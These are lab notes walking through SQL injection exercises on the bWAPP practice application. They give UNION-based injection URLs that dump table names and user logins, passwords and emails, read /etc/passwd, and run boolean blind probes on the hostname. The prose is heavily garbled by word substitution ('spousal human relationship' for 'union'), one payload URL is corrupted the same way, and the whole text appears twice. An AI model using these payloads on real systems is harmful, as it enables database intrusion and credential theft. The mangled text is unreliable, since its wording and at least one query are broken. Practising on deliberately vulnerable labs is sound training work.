These are my quick notes that I recorded equally I worked through bWAPP v2.2
--- SQLi GET / Search Results - With safety degree laid upwards to low
URL alongside SQLi:
http://bwapp/sqli_1.php?title=a' spousal human relationship SELECT 1,table_schema,table_name,4,5,6,7 FROM information_schema.tables WHERE table_schema!='mysql' AND table_schema!='information_schema&action=search
The to a higher house interrogation was taken from the MySQL SQL Injection Cheat Sheet located here. The role of this interrogation is to direct maintain returned the database as well as tabular array names of the database. I besides had to experiment alongside the divulge of columns that were expected as well as how it was displayed.
Now I require to honour out the construction of the tables...
URL for SQLi:
http://bwapp/sqli_1.php?title=a%27%20union%20SELECT%201,table_schema,%20table_name,%204,column_name,6,7%20FROM%20information_schema.columns%20WHERE%20column_name=%27password%27%20AND%20table_schema%20!=%20%27mysql%27%20AND%20table_schema%20!=%20%27information_schema&action=search
The to a higher house SQL injection returns the columns of the tables that comprise the give-and-take password inwards them as well as then instantly nosotros tin give the axe formulate our interrogation to get extracting information. The below interrogation counts the records inwards the users tabular array earlier nosotros extract it inwards the trial a lot of records are available to move extracted.
http://bwapp/sqli_1.php?title=a%27%20union%20SELECT%201,%20count%28*%29,%203,%204,%205,%206,%207%20FROM%20bWAPP.users%20where%20login!=%27zaz&action=search
This returns that at that spot are two records that tin give the axe move extracted.
http://bwapp/sqli_1.php?title=a%27%20union%20SELECT%201,%20login,%20password,%20email,%20admin,%206,%207%20FROM%20bWAPP.users%20where%20login!=%27zaz&action=search
The to a higher house interrogation returned the login, password, electronic mail as well as if they are an admin of the application inwards the search results...
--- SQLi GET / Select - With safety degree laid upwards to low...
In this challenge it solely returns 1 tape at a fourth dimension because evaluating the code it does non loop only about the recordset that is returned. This adds a small-scale challenge, however, non impossible to create the same matter equally above.
SQLi URL:
http://bwapp/sqli_2.php?movie=99%20union%20SELECT%201,table_schema,table_name,4,LOAD_FILE%28%27/etc/passwd%27%29,6,7%20FROM%20information_schema.tables%20WHERE%20table_schema%20!=%20%27mysql%27%20AND%20table_schema%20!=%20%27information_schema%27&action=go
The to a higher house interrogation returns the 99th row of the spousal human relationship selected interrogation alongside besides loading the /etc/passwd file as well as then nosotros tin give the axe get together the user names on the system.
SQL Injection Boolean Based
— The below method would allow for trying each grapheme inwards a grapheme laid upwards until it came dorsum alongside the right character...
Iron Man' AND SUBSTRING(@@hostname,1,1) = ‘b - Worked
Iron Man’ AND SUBSTRING(@@hostname,2,1) = ‘W - Worked
— What if nosotros utilisation regular expressions to create upwards one's hear if the missive of the alphabet is betwixt a laid upwards of characters…
Iron Man’ AND SUBSTRING(@@hostname,1,1) REGEXP ‘[a-n] - Returns True
Iron Man’ AND SUBSTRING(@@hostname,1,1) REGEXP ‘[a-g] - Returns True
Iron Man’ AND SUBSTRING(@@hostname,1,1) REGEXP ‘[a-c] - Returns True
— This narrows it downward to less than 8 queries to figure out the offset grapheme of the hostname… It would direct maintain taken two or 28 depending on if yous started alongside a-z or A-Z.
--- SQLi GET / Search Results - With safety degree laid upwards to low
URL alongside SQLi:
http://bwapp/sqli_1.php?title=a' spousal human relationship SELECT 1,table_schema,table_name,4,5,6,7 FROM information_schema.tables WHERE table_schema!='mysql' AND table_schema!='information_schema&action=search
The to a higher house interrogation was taken from the MySQL SQL Injection Cheat Sheet located here. The role of this interrogation is to direct maintain returned the database as well as tabular array names of the database. I besides had to experiment alongside the divulge of columns that were expected as well as how it was displayed.
Now I require to honour out the construction of the tables...
URL for SQLi:
http://bwapp/sqli_1.php?title=a%27%20union%20SELECT%201,table_schema,%20table_name,%204,column_name,6,7%20FROM%20information_schema.columns%20WHERE%20column_name=%27password%27%20AND%20table_schema%20!=%20%27mysql%27%20AND%20table_schema%20!=%20%27information_schema&action=search
The to a higher house SQL injection returns the columns of the tables that comprise the give-and-take password inwards them as well as then instantly nosotros tin give the axe formulate our interrogation to get extracting information. The below interrogation counts the records inwards the users tabular array earlier nosotros extract it inwards the trial a lot of records are available to move extracted.
http://bwapp/sqli_1.php?title=a%27%20union%20SELECT%201,%20count%28*%29,%203,%204,%205,%206,%207%20FROM%20bWAPP.users%20where%20login!=%27zaz&action=search
This returns that at that spot are two records that tin give the axe move extracted.
http://bwapp/sqli_1.php?title=a%27%20union%20SELECT%201,%20login,%20password,%20email,%20admin,%206,%207%20FROM%20bWAPP.users%20where%20login!=%27zaz&action=search
The to a higher house interrogation returned the login, password, electronic mail as well as if they are an admin of the application inwards the search results...
--- SQLi GET / Select - With safety degree laid upwards to low...
In this challenge it solely returns 1 tape at a fourth dimension because evaluating the code it does non loop only about the recordset that is returned. This adds a small-scale challenge, however, non impossible to create the same matter equally above.
SQLi URL:
http://bwapp/sqli_2.php?movie=99%20union%20SELECT%201,table_schema,table_name,4,LOAD_FILE%28%27/etc/passwd%27%29,6,7%20FROM%20information_schema.tables%20WHERE%20table_schema%20!=%20%27mysql%27%20AND%20table_schema%20!=%20%27information_schema%27&action=go
The to a higher house interrogation returns the 99th row of the spousal human relationship selected interrogation alongside besides loading the /etc/passwd file as well as then nosotros tin give the axe get together the user names on the system.
SQL Injection Boolean Based
— The below method would allow for trying each grapheme inwards a grapheme laid upwards until it came dorsum alongside the right character...
Iron Man' AND SUBSTRING(@@hostname,1,1) = ‘b - Worked
Iron Man’ AND SUBSTRING(@@hostname,2,1) = ‘W - Worked
— What if nosotros utilisation regular expressions to create upwards one's hear if the missive of the alphabet is betwixt a laid upwards of characters…
Iron Man’ AND SUBSTRING(@@hostname,1,1) REGEXP ‘[a-n] - Returns True
Iron Man’ AND SUBSTRING(@@hostname,1,1) REGEXP ‘[a-g] - Returns True
Iron Man’ AND SUBSTRING(@@hostname,1,1) REGEXP ‘[a-c] - Returns True
— This narrows it downward to less than 8 queries to figure out the offset grapheme of the hostname… It would direct maintain taken two or 28 depending on if yous started alongside a-z or A-Z.
